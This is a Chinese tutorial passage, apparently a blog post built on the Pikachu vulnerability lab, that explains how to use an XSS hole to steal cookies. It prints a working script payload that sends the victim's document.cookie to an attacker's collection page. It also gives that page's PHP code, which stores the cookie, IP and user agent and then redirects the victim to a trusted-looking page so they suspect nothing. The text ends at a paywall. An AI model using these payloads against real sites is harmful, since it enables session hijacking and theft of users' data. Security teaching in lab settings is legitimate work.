本文详细介绍了XSS漏洞的三种利用方式:通过构造恶意URL窃取cookie信息,实现钓鱼攻击,以及利用键盘记录获取用户输入。文中展示了攻击过程,包括payload设计和攻击者后台数据收集,强调了跨域和同源策略在防止此类攻击中的作用。
cookie的窃取和利用
流程: 用户访问含有xss漏洞的页面触发脚本,执行脚本发送cookie信息给攻击者的后台(这里用pkxss后台为例)
我们的思路是:制造含有(获得cookie等敏感信息的)恶意URL,让别人访问,获取别人的cookie等敏感信息。
我们的payload:
<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
意思是一旦访问这个页面就会跳转到http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php
访问的时候还带着cookie,然后攻击者的cookie文件如下:
<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
//这个是获取cookie的api页面
if(isset($_GET['cookie'])){
$time=date('Y-m-d g:i:s');
$ipaddress=getenv ('REMOTE_ADDR');
$cookie=$_GET['cookie'];
$referer=$_SERVER['HTTP_REFERER'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$query="insert cookies(time,ipaddress,cookie,referer,useragent)
values('$time','$ipaddress','$cookie','$referer','$useragent')";
$result=mysqli_query($link, $query);
}
header("Location:http://127.0.0.1/pikachu/index.php");//重定向到一个可信的网站
?>
我们可以看到攻击者获得的东西:time,ipaddress,cookie,referer,useragent
然后又跳转页面到一个安全的网站,为了显得不突兀,让跳转的页面和之前的页面尽量保持一致(就是不要让点击这个URL的人产生怀疑嘛)。
在那个含有xss漏洞的网站输入我们构造的payload我们得到了我们制造的URL:
最低0.47元/天 解锁文章
7239
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
